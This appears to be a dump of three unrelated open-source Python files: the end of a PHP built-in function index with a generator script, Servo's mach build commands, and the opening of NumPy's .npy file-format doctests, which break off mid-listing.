'trader_ma', 'trader_macd', 'trader_macdext', 'trader_macdfix', 'trader_mama', 'trader_mavp', 'trader_max', 'trader_maxindex', 'trader_medprice', 'trader_mfi', 'trader_midpoint', 'trader_midprice', 'trader_min', 'trader_minindex', 'trader_minmax', 'trader_minmaxindex', 'trader_minus_di', 'trader_minus_dm', 'trader_mom', 'trader_mult', 'trader_natr', 'trader_obv', 'trader_plus_di', 'trader_plus_dm', 'trader_ppo', 'trader_roc', 'trader_rocp', 'trader_rocr100', 'trader_rocr', 'trader_rsi', 'trader_sar', 'trader_sarext', 'trader_set_compat', 'trader_set_unstable_period', 'trader_sin', 'trader_sinh', 'trader_sma', 'trader_sqrt', 'trader_stddev', 'trader_stoch', 'trader_stochf', 'trader_stochrsi', 'trader_sub', 'trader_sum', 'trader_t3', 'trader_tan', 'trader_tanh', 'trader_tema', 'trader_trange', 'trader_trima', 'trader_trix', 'trader_tsf', 'trader_typprice', 'trader_ultosc', 'trader_var', 'trader_wclprice', 'trader_willr', 'trader_wma'], 'URL': ['base64_decode', 'base64_encode', 'get_headers', 'get_meta_tags', 'http_build_query', 'parse_url', 'rawurldecode', 'rawurlencode', 'urldecode', 'urlencode'], 'Uopz': ['uopz_backup', 'uopz_compose', 'uopz_copy', 'uopz_delete', 'uopz_extend', 'uopz_flags', 'uopz_function', 'uopz_implement', 'uopz_overload', 'uopz_redefine', 'uopz_rename', 'uopz_restore', 'uopz_undefine'], 'Variable handling': ['boolval', 'debug_zval_dump', 'doubleval', 'empty', 'floatval', 'get_defined_vars', 'get_resource_type', 'gettype', 'import_request_variables', 'intval', 'is_array', 'is_bool', 'is_callable', 'is_double', 'is_float', 'is_int', 'is_integer', 'is_long', 'is_null', 'is_numeric', 'is_object', 'is_real', 'is_resource', 'is_scalar', 'is_string', 'isset', 'print_r', 'serialize', 'settype', 'strval', 'unserialize', 'unset', 'var_dump', 'var_export'], 'W32api': ['w32api_deftype', 'w32api_init_dtype', 'w32api_invoke_function', 'w32api_register_function', 'w32api_set_call_method'], 'WDDX': ['wddx_add_vars', 'wddx_deserialize', 'wddx_packet_end', 'wddx_packet_start', 'wddx_serialize_value', 'wddx_serialize_vars'], 'WinCache': ['wincache_fcache_fileinfo', 'wincache_fcache_meminfo', 'wincache_lock', 'wincache_ocache_fileinfo', 'wincache_ocache_meminfo', 'wincache_refresh_if_changed', 'wincache_rplist_fileinfo', 'wincache_rplist_meminfo', 'wincache_scache_info', 'wincache_scache_meminfo', 'wincache_ucache_add', 'wincache_ucache_cas', 'wincache_ucache_clear', 'wincache_ucache_dec', 'wincache_ucache_delete', 'wincache_ucache_exists', 'wincache_ucache_get', 'wincache_ucache_inc', 'wincache_ucache_info', 'wincache_ucache_meminfo', 'wincache_ucache_set', 'wincache_unlock'], 'XML Parser': ['utf8_decode', 'utf8_encode', 'xml_error_string', 'xml_get_current_byte_index', 'xml_get_current_column_number', 'xml_get_current_line_number', 'xml_get_error_code', 'xml_parse_into_struct', 'xml_parse', 'xml_parser_create_ns', 'xml_parser_create', 'xml_parser_free', 'xml_parser_get_option', 'xml_parser_set_option', 'xml_set_character_data_handler', 'xml_set_default_handler', 'xml_set_element_handler', 'xml_set_end_namespace_decl_handler', 'xml_set_external_entity_ref_handler', 'xml_set_notation_decl_handler', 'xml_set_object', 'xml_set_processing_instruction_handler', 'xml_set_start_namespace_decl_handler', 'xml_set_unparsed_entity_decl_handler'], 'XML-RPC': ['xmlrpc_decode_request', 'xmlrpc_decode', 'xmlrpc_encode_request', 'xmlrpc_encode', 'xmlrpc_get_type', 'xmlrpc_is_fault', 'xmlrpc_parse_method_descriptions', 'xmlrpc_server_add_introspection_data', 'xmlrpc_server_call_method', 'xmlrpc_server_create', 'xmlrpc_server_destroy', 'xmlrpc_server_register_introspection_callback', 'xmlrpc_server_register_method', 'xmlrpc_set_type'], 'XSLT (PHP 4)': ['xslt_backend_info', 'xslt_backend_name', 'xslt_backend_version', 'xslt_create', 'xslt_errno', 'xslt_error', 'xslt_free', 'xslt_getopt', 'xslt_process', 'xslt_set_base', 'xslt_set_encoding', 'xslt_set_error_handler', 'xslt_set_log', 'xslt_set_object', 'xslt_set_sax_handler', 'xslt_set_sax_handlers', 'xslt_set_scheme_handler', 'xslt_set_scheme_handlers', 'xslt_setopt'], 'Xhprof': ['xhprof_disable', 'xhprof_enable', 'xhprof_sample_disable', 'xhprof_sample_enable'], 'YAZ': ['yaz_addinfo', 'yaz_ccl_conf', 'yaz_ccl_parse', 'yaz_close', 'yaz_connect', 'yaz_database', 'yaz_element', 'yaz_errno', 'yaz_error', 'yaz_es_result', 'yaz_es', 'yaz_get_option', 'yaz_hits', 'yaz_itemorder', 'yaz_present', 'yaz_range', 'yaz_record', 'yaz_scan_result', 'yaz_scan', 'yaz_schema', 'yaz_search', 'yaz_set_option', 'yaz_sort', 'yaz_syntax', 'yaz_wait'], 'YP/NIS': ['yp_all', 'yp_cat', 'yp_err_string', 'yp_errno', 'yp_first', 'yp_get_default_domain', 'yp_master', 'yp_match', 'yp_next', 'yp_order'], 'Yaml': ['yaml_emit_file', 'yaml_emit', 'yaml_parse_file', 'yaml_parse_url', 'yaml_parse'], 'Zip': ['zip_close', 'zip_entry_close', 'zip_entry_compressedsize', 'zip_entry_compressionmethod', 'zip_entry_filesize', 'zip_entry_name', 'zip_entry_open', 'zip_entry_read', 'zip_open', 'zip_read'], 'Zlib': ['gzclose', 'gzcompress', 'gzdecode', 'gzdeflate', 'gzencode', 'gzeof', 'gzfile', 'gzgetc', 'gzgets', 'gzgetss', 'gzinflate', 'gzopen', 'gzpassthru', 'gzputs', 'gzread', 'gzrewind', 'gzseek', 'gztell', 'gzuncompress', 'gzwrite', 'readgzfile', 'zlib_decode', 'zlib_encode', 'zlib_get_coding_type'], 'bcompiler': ['bcompiler_load_exe', 'bcompiler_load', 'bcompiler_parse_class', 'bcompiler_read', 'bcompiler_write_class', 'bcompiler_write_constant', 'bcompiler_write_exe_footer', 'bcompiler_write_file', 'bcompiler_write_footer', 'bcompiler_write_function', 'bcompiler_write_functions_from_file', 'bcompiler_write_header', 'bcompiler_write_included_filename'], 'cURL': ['curl_close', 'curl_copy_handle', 'curl_errno', 'curl_error', 'curl_escape', 'curl_exec', 'curl_file_create', 'curl_getinfo', 'curl_init', 'curl_multi_add_handle', 'curl_multi_close', 'curl_multi_exec', 'curl_multi_getcontent', 'curl_multi_info_read', 'curl_multi_init', 'curl_multi_remove_handle', 'curl_multi_select', 'curl_multi_setopt', 'curl_multi_strerror', 'curl_pause', 'curl_reset', 'curl_setopt_array', 'curl_setopt', 'curl_share_close', 'curl_share_init', 'curl_share_setopt', 'curl_strerror', 'curl_unescape', 'curl_version'], 'chdb': ['chdb_create'], 'dBase': ['dbase_add_record', 'dbase_close', 'dbase_create', 'dbase_delete_record', 'dbase_get_header_info', 'dbase_get_record_with_names', 'dbase_get_record', 'dbase_numfields', 'dbase_numrecords', 'dbase_open', 'dbase_pack', 'dbase_replace_record'], 'dbx': ['dbx_close', 'dbx_compare', 'dbx_connect', 'dbx_error', 'dbx_escape_string', 'dbx_fetch_row', 'dbx_query', 'dbx_sort'], 'filePro': ['filepro_fieldcount', 'filepro_fieldname', 'filepro_fieldtype', 'filepro_fieldwidth', 'filepro_retrieve', 'filepro_rowcount', 'filepro'], 'iconv': ['iconv_get_encoding', 'iconv_mime_decode_headers', 'iconv_mime_decode', 'iconv_mime_encode', 'iconv_set_encoding', 'iconv_strlen', 'iconv_strpos', 'iconv_strrpos', 'iconv_substr', 'iconv', 'ob_iconv_handler'], 'inclued': ['inclued_get_data'], 'intl': ['intl_error_name', 'intl_get_error_code', 'intl_get_error_message', 'intl_is_failure'], 'libxml': ['libxml_clear_errors', 'libxml_disable_entity_loader', 'libxml_get_errors', 'libxml_get_last_error', 'libxml_set_external_entity_loader', 'libxml_set_streams_context', 'libxml_use_internal_errors'], 'mSQL': ['msql_affected_rows', 'msql_close', 'msql_connect', 'msql_create_db', 'msql_createdb', 'msql_data_seek', 'msql_db_query', 'msql_dbname', 'msql_drop_db', 'msql_error', 'msql_fetch_array', 'msql_fetch_field', 'msql_fetch_object', 'msql_fetch_row', 'msql_field_flags', 'msql_field_len', 'msql_field_name', 'msql_field_seek', 'msql_field_table', 'msql_field_type', 'msql_fieldflags', 'msql_fieldlen', 'msql_fieldname', 'msql_fieldtable', 'msql_fieldtype', 'msql_free_result', 'msql_list_dbs', 'msql_list_fields', 'msql_list_tables', 'msql_num_fields', 'msql_num_rows', 'msql_numfields', 'msql_numrows', 'msql_pconnect', 'msql_query', 'msql_regcase', 'msql_result', 'msql_select_db', 'msql_tablename', 'msql'], 'mnoGoSearch': ['udm_add_search_limit', 'udm_alloc_agent_array', 'udm_alloc_agent', 'udm_api_version', 'udm_cat_list', 'udm_cat_path', 'udm_check_charset', 'udm_check_stored', 'udm_clear_search_limits', 'udm_close_stored', 'udm_crc32', 'udm_errno', 'udm_error', 'udm_find', 'udm_free_agent', 'udm_free_ispell_data', 'udm_free_res', 'udm_get_doc_count', 'udm_get_res_field', 'udm_get_res_param', 'udm_hash32', 'udm_load_ispell_data', 'udm_open_stored', 'udm_set_agent_param'], 'mqseries': ['mqseries_back', 'mqseries_begin', 'mqseries_close', 'mqseries_cmit', 'mqseries_conn', 'mqseries_connx', 'mqseries_disc', 'mqseries_get', 'mqseries_inq', 'mqseries_open', 'mqseries_put1', 'mqseries_put', 'mqseries_set', 'mqseries_strerror'], 'mysqlnd_qc': ['mysqlnd_qc_clear_cache', 'mysqlnd_qc_get_available_handlers', 'mysqlnd_qc_get_cache_info', 'mysqlnd_qc_get_core_stats', 'mysqlnd_qc_get_normalized_query_trace_log', 'mysqlnd_qc_get_query_trace_log', 'mysqlnd_qc_set_cache_condition', 'mysqlnd_qc_set_is_select', 'mysqlnd_qc_set_storage_handler', 'mysqlnd_qc_set_user_handlers'], 'qtdom': ['qdom_error', 'qdom_tree'], 'runkit': ['runkit_class_adopt', 'runkit_class_emancipate', 'runkit_constant_add', 'runkit_constant_redefine', 'runkit_constant_remove', 'runkit_function_add', 'runkit_function_copy', 'runkit_function_redefine', 'runkit_function_remove', 'runkit_function_rename', 'runkit_import', 'runkit_lint_file', 'runkit_lint', 'runkit_method_add', 'runkit_method_copy', 'runkit_method_redefine', 'runkit_method_remove', 'runkit_method_rename', 'runkit_return_value_used', 'runkit_sandbox_output_handler', 'runkit_superglobals'], 'ssdeep': ['ssdeep_fuzzy_compare', 'ssdeep_fuzzy_hash_filename', 'ssdeep_fuzzy_hash'], 'vpopmail': ['vpopmail_add_alias_domain_ex', 'vpopmail_add_alias_domain', 'vpopmail_add_domain_ex', 'vpopmail_add_domain', 'vpopmail_add_user', 'vpopmail_alias_add', 'vpopmail_alias_del_domain', 'vpopmail_alias_del', 'vpopmail_alias_get_all', 'vpopmail_alias_get', 'vpopmail_auth_user', 'vpopmail_del_domain_ex', 'vpopmail_del_domain', 'vpopmail_del_user', 'vpopmail_error', 'vpopmail_passwd', 'vpopmail_set_user_quota'], 'win32ps': ['win32_ps_list_procs', 'win32_ps_stat_mem', 'win32_ps_stat_proc'], 'win32service': ['win32_continue_service', 'win32_create_service', 'win32_delete_service', 'win32_get_last_control_message', 'win32_pause_service', 'win32_query_service_status', 'win32_set_service_status', 'win32_start_service_ctrl_dispatcher', 'win32_start_service', 'win32_stop_service'], 'xattr': ['xattr_get', 'xattr_list', 'xattr_remove', 'xattr_set', 'xattr_supported'], 'xdiff': ['xdiff_file_bdiff_size', 'xdiff_file_bdiff', 'xdiff_file_bpatch', 'xdiff_file_diff_binary', 'xdiff_file_diff', 'xdiff_file_merge3', 'xdiff_file_patch_binary', 'xdiff_file_patch', 'xdiff_file_rabdiff', 'xdiff_string_bdiff_size', 'xdiff_string_bdiff', 'xdiff_string_bpatch', 'xdiff_string_diff_binary', 'xdiff_string_diff', 'xdiff_string_merge3', 'xdiff_string_patch_binary', 'xdiff_string_patch', 'xdiff_string_rabdiff']} if __name__ == '__main__': import glob import os import pprint import re import shutil import tarfile try: from urllib import urlretrieve except ImportError: from urllib.request import urlretrieve PHP_MANUAL_URL = 'http://us3.php.net/distributions/manual/php_manual_en.tar.gz' PHP_MANUAL_DIR = './php-chunked-xhtml/' PHP_REFERENCE_GLOB = 'ref.*' PHP_FUNCTION_RE = '<a href="function\..*?\.html">(.*?)</a>' PHP_MODULE_RE = '<title>(.*?) Functions</title>' def get_php_functions(): function_re = re.compile(PHP_FUNCTION_RE) module_re = re.compile(PHP_MODULE_RE) modules = {} for file in get_php_references(): module = '' for line in open(file): if not module: search = module_re.search(line) if search: module = search.group(1) modules[module] = [] elif 'href="function.' in line: for match in function_re.finditer(line): fn = match.group(1) if '-&gt;' not in fn and '::' not in fn and fn not in modules[module]: modules[module].append(fn) if module: # These are dummy manual pages, not actual functions if module == 'PHP Options/Info': modules[module].remove('main') if module == 'Filesystem': modules[module].remove('delete') if not modules[module]: del modules[module] return modules def get_php_references(): download = urlretrieve(PHP_MANUAL_URL) tar = tarfile.open(download[0]) tar.extractall() tar.close() for file in glob.glob("%s%s" % (PHP_MANUAL_DIR, PHP_REFERENCE_GLOB)): yield file os.remove(download[0]) def regenerate(filename, modules): f = open(filename) try: content = f.read() finally: f.close() header = content[:content.find('MODULES = {')] footer = content[content.find("if __name__ == '__main__':"):] f = open(filename, 'w') f.write(header) f.write('MODULES = %s\n\n' % pprint.pformat(modules)) f.write(footer) f.close() def run(): print('>> Downloading Function Index') modules = get_php_functions() total = sum(len(v) for v in modules.values()) print('%d functions found' % total) regenerate(__file__, modules) shutil.rmtree(PHP_MANUAL_DIR) run()
mit
walac/servo
python/servo/build_commands.py
3
12824
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT # file at the top-level directory of this distribution. # # Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or # http://www.apache.org/licenses/LICENSE-2.0> or the MIT license # <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your # option. This file may not be copied, modified, or distributed # except according to those terms. from __future__ import print_function, unicode_literals import os import os.path as path import subprocess import sys from time import time from mach.decorators import ( CommandArgument, CommandProvider, Command, ) from servo.command_base import CommandBase, cd def is_headless_build(): return int(os.getenv('SERVO_HEADLESS', 0)) == 1 def notify_linux(title, text): try: import dbus bus = dbus.SessionBus() notify_obj = bus.get_object("org.freedesktop.Notifications", "/org/freedesktop/Notifications") method = notify_obj.get_dbus_method("Notify", "org.freedesktop.Notifications") method(title, 0, "", text, "", [], [], -1) except: raise Exception("Please make sure that the Python dbus module is installed!") def notify_win(title, text): from ctypes import Structure, windll, POINTER, sizeof from ctypes.wintypes import DWORD, HANDLE, WINFUNCTYPE, BOOL, UINT class FLASHWINDOW(Structure): _fields_ = [("cbSize", UINT), ("hwnd", HANDLE), ("dwFlags", DWORD), ("uCount", UINT), ("dwTimeout", DWORD)] FlashWindowExProto = WINFUNCTYPE(BOOL, POINTER(FLASHWINDOW)) FlashWindowEx = FlashWindowExProto(("FlashWindowEx", windll.user32)) FLASHW_CAPTION = 0x01 FLASHW_TRAY = 0x02 FLASHW_TIMERNOFG = 0x0C params = FLASHWINDOW(sizeof(FLASHWINDOW), windll.kernel32.GetConsoleWindow(), FLASHW_CAPTION | FLASHW_TRAY | FLASHW_TIMERNOFG, 3, 0) FlashWindowEx(params) def notify_darwin(title, text): try: import Foundation import objc NSUserNotification = objc.lookUpClass("NSUserNotification") NSUserNotificationCenter = objc.lookUpClass("NSUserNotificationCenter") note = NSUserNotification.alloc().init() note.setTitle_(title) note.setInformativeText_(text) now = Foundation.NSDate.dateWithTimeInterval_sinceDate_(0, Foundation.NSDate.date()) note.setDeliveryDate_(now) centre = NSUserNotificationCenter.defaultUserNotificationCenter() centre.scheduleNotification_(note) except ImportError: raise Exception("Please make sure that the Python pyobjc module is installed!") def notify_build_done(elapsed): """Generate desktop notification when build is complete and the elapsed build time was longer than 30 seconds.""" if elapsed > 30: notify("Servo build", "Completed in %0.2fs" % elapsed) def notify(title, text): """Generate a desktop notification using appropriate means on supported platforms Linux, Windows, and Mac OS. On unsupported platforms, this function acts as a no-op.""" platforms = { "linux": notify_linux, "win": notify_win, "darwin": notify_darwin } func = platforms.get(sys.platform) if func is not None: try: func(title, text) except Exception as e: extra = getattr(e, "message", "") print("[Warning] Could not generate notification! %s" % extra, file=sys.stderr) def call(*args, **kwargs): """Wrap `subprocess.call`, printing the command if verbose=True.""" verbose = kwargs.pop('verbose', False) if verbose: print(' '.join(args[0])) return subprocess.call(*args, **kwargs) @CommandProvider class MachCommands(CommandBase): @Command('build', description='Build Servo', category='build') @CommandArgument('--target', '-t', default=None, help='Cross compile for given target platform') @CommandArgument('--release', '-r', action='store_true', help='Build in release mode') @CommandArgument('--dev', '-d', action='store_true', help='Build in development mode') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--android', default=None, action='store_true', help='Build for Android') @CommandArgument('--debug-mozjs', default=None, action='store_true', help='Enable debug assertions in mozjs') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('params', nargs='...', help="Command-line arguments to be passed through to Cargo") def build(self, target=None, release=False, dev=False, jobs=None, android=None, verbose=False, debug_mozjs=False, params=None): if android is None: android = self.config["build"]["android"] opts = params or [] features = [] base_path = self.get_target_dir() release_path = path.join(base_path, "release", "servo") dev_path = path.join(base_path, "debug", "servo") release_exists = path.exists(release_path) dev_exists = path.exists(dev_path) if not (release or dev): if self.config["build"]["mode"] == "dev": dev = True elif self.config["build"]["mode"] == "release": release = True elif release_exists and not dev_exists: release = True elif dev_exists and not release_exists: dev = True else: print("Please specify either --dev (-d) for a development") print(" build, or --release (-r) for an optimized build.") sys.exit(1) if release and dev: print("Please specify either --dev or --release.") sys.exit(1) self.ensure_bootstrapped() if release: opts += ["--release"] if target: opts += ["--target", target] if jobs is not None: opts += ["-j", jobs] if verbose: opts += ["-v"] if android: # Ensure the APK builder submodule has been built first apk_builder_dir = "support/android-rs-glue" with cd(path.join(apk_builder_dir, "apk-builder")): status = call(["cargo", "build"], env=self.build_env(), verbose=verbose) if status: return status opts += ["--target", "arm-linux-androideabi"] if debug_mozjs or self.config["build"]["debug-mozjs"]: features += ["script/debugmozjs"] if is_headless_build(): opts += ["--no-default-features"] features += ["headless"] if android: features += ["android_glue"] if features: opts += ["--features", "%s" % ' '.join(features)] build_start = time() env = self.build_env() if android: # Build OpenSSL for android make_cmd = ["make"] if jobs is not None: make_cmd += ["-j" + jobs] with cd(self.android_support_dir()): status = call( make_cmd + ["-f", "openssl.makefile"], env=self.build_env(), verbose=verbose) if status: return status openssl_dir = path.join(self.android_support_dir(), "openssl-1.0.1k") env['OPENSSL_LIB_DIR'] = openssl_dir env['OPENSSL_INCLUDE_DIR'] = path.join(openssl_dir, "include") env['OPENSSL_STATIC'] = 'TRUE' status = call( ["cargo", "build"] + opts, env=env, cwd=self.servo_crate(), verbose=verbose) elapsed = time() - build_start # Generate Desktop Notification if elapsed-time > some threshold value notify_build_done(elapsed) print("Build completed in %0.2fs" % elapsed) # XXX(#7339) Android build is broken if android: return 0 return status @Command('build-cef', description='Build the Chromium Embedding Framework library', category='build') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('--release', '-r', action='store_true', help='Build in release mode') def build_cef(self, jobs=None, verbose=False, release=False): self.ensure_bootstrapped() ret = None opts = [] if jobs is not None: opts += ["-j", jobs] if verbose: opts += ["-v"] if release: opts += ["--release"] build_start = time() with cd(path.join("ports", "cef")): ret = call(["cargo", "build"] + opts, env=self.build_env(), verbose=verbose) elapsed = time() - build_start # Generate Desktop Notification if elapsed-time > some threshold value notify_build_done(elapsed) print("CEF build completed in %0.2fs" % elapsed) return ret @Command('build-gonk', description='Build the Gonk port', category='build') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('--release', '-r', action='store_true', help='Build in release mode') def build_gonk(self, jobs=None, verbose=False, release=False): self.ensure_bootstrapped() ret = None opts = [] if jobs is not None: opts += ["-j", jobs] if verbose: opts += ["-v"] if release: opts += ["--release"] opts += ["--target", "arm-linux-androideabi"] env = self.build_env(gonk=True) build_start = time() with cd(path.join("ports", "gonk")): ret = call(["cargo", "build"] + opts, env=env, verbose=verbose) elapsed = time() - build_start # Generate Desktop Notification if elapsed-time > some threshold value notify_build_done(elapsed) print("Gonk build completed in %0.2fs" % elapsed) return ret @Command('build-tests', description='Build the Servo test suites', category='build') @CommandArgument('--jobs', '-j', default=None, help='Number of jobs to run in parallel') @CommandArgument('--release', default=False, action="store_true", help="Build tests with release mode") def build_tests(self, jobs=None, verbose=False, release=False): self.ensure_bootstrapped() args = ["cargo", "test", "--no-run"] if is_headless_build(): args += ["--no-default-features", "--features", "headless"] if release: args += ["--release"] return call( args, env=self.build_env(), cwd=self.servo_crate(), verbose=verbose) @Command('clean', description='Clean the build directory.', category='build') @CommandArgument('--manifest-path', default=None, help='Path to the manifest to the package to clean') @CommandArgument('--verbose', '-v', action='store_true', help='Print verbose output') @CommandArgument('params', nargs='...', help="Command-line arguments to be passed through to Cargo") def clean(self, manifest_path, params, verbose=False): self.ensure_bootstrapped() opts = [] if manifest_path: opts += ["--manifest-path", manifest_path] if verbose: opts += ["-v"] opts += params return call(["cargo", "clean"] + opts, env=self.build_env(), cwd=self.servo_crate(), verbose=verbose)
mpl-2.0
Denisolt/Tensorflow_Chat_Bot
local/lib/python2.7/site-packages/numpy/lib/tests/test_format.py
27
34230
from __future__ import division, absolute_import, print_function r''' Test the .npy file format. Set up: >>> import sys >>> from io import BytesIO >>> from numpy.lib import format >>> >>> scalars = [ ... np.uint8, ... np.int8, ... np.uint16, ... np.int16, ... np.uint32, ... np.int32, ... np.uint64, ... np.int64, ... np.float32, ... np.float64, ... np.complex64, ... np.complex128, ... object, ... ] >>> >>> basic_arrays = [] >>> >>> for scalar in scalars: ... for endian in '<>': ... dtype = np.dtype(scalar).newbyteorder(endian) ... basic = np.arange(15).astype(dtype) ... basic_arrays.extend([ ... np.array([], dtype=dtype), ... np.array(10, dtype=dtype), ... basic, ... basic.reshape((3,5)), ... basic.reshape((3,5)).T, ... basic.reshape((3,5))[::-1,::2], ... ]) ... >>> >>> Pdescr = [ ... ('x', 'i4', (2,)), ... ('y', 'f8', (2, 2)), ... ('z', 'u1')] >>> >>> >>> PbufferT = [ ... ([3,2], [[6.,4.],[6.,4.]], 8), ... ([4,3], [[7.,5.],[7.,5.]], 9), ... ] >>> >>> >>> Ndescr = [ ... ('x', 'i4', (2,)), ... ('Info', [ ... ('value', 'c16'), ... ('y2', 'f8'), ... ('Info2', [ ... ('name', 'S2'), ... ('value', 'c16', (2,)), ... ('y3', 'f8', (2,)), ... ('z3', 'u4', (2,))]), ... ('name', 'S2'), ... ('z2', 'b1')]), ... ('color', 'S2'), ... ('info', [ ... ('Name', 'U8'), ... ('Value', 'c16')]), ... ('y', 'f8', (2, 2)), ... ('z', 'u1')] >>> >>> >>> NbufferT = [ ... ([3,2], (6j, 6., ('nn', [6j,4j], [6.,4.], [1,2]), 'NN', True), 'cc', ('NN', 6j), [[6.,4.],[6.,4.]], 8), ... ([4,3], (7j, 7., ('oo', [7j,5j], [7.,5.], [2,1]), 'OO', False), 'dd', ('OO', 7j), [[7.,5.],[7.,5.]], 9), ... ] >>> >>> >>> record_arrays = [ ... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')), ... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')), ... np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')), ... np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')), ... ] Test the magic string writing. >>> format.magic(1, 0) '\x93NUMPY\x01\x00' >>> format.magic(0, 0) '\x93NUMPY\x00\x00' >>> format.magic(255, 255) '\x93NUMPY\xff\xff' >>> format.magic(2, 5) '\x93NUMPY\x02\x05' Test the magic string reading. >>> format.read_magic(BytesIO(format.magic(1, 0))) (1, 0) >>> format.read_magic(BytesIO(format.magic(0, 0))) (0, 0) >>> format.read_magic(BytesIO(format.magic(255, 255))) (255, 255) >>> format.read_magic(BytesIO(format.magic(2, 5))) (2, 5) Test the header writing. >>> for arr in basic_arrays + record_arrays: ... f = BytesIO() ... format.write_array_header_1_0(f, arr) # XXX: arr is not a dict, items gets called on it ... print(repr(f.getvalue())) ... "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|u1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|u1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '|i1', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '|i1', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<u2', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<u2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>u2', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>u2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<i2', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<i2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>i2', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>i2', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<u4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<u4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>u4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>u4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<i4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<i4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': ()} \n" 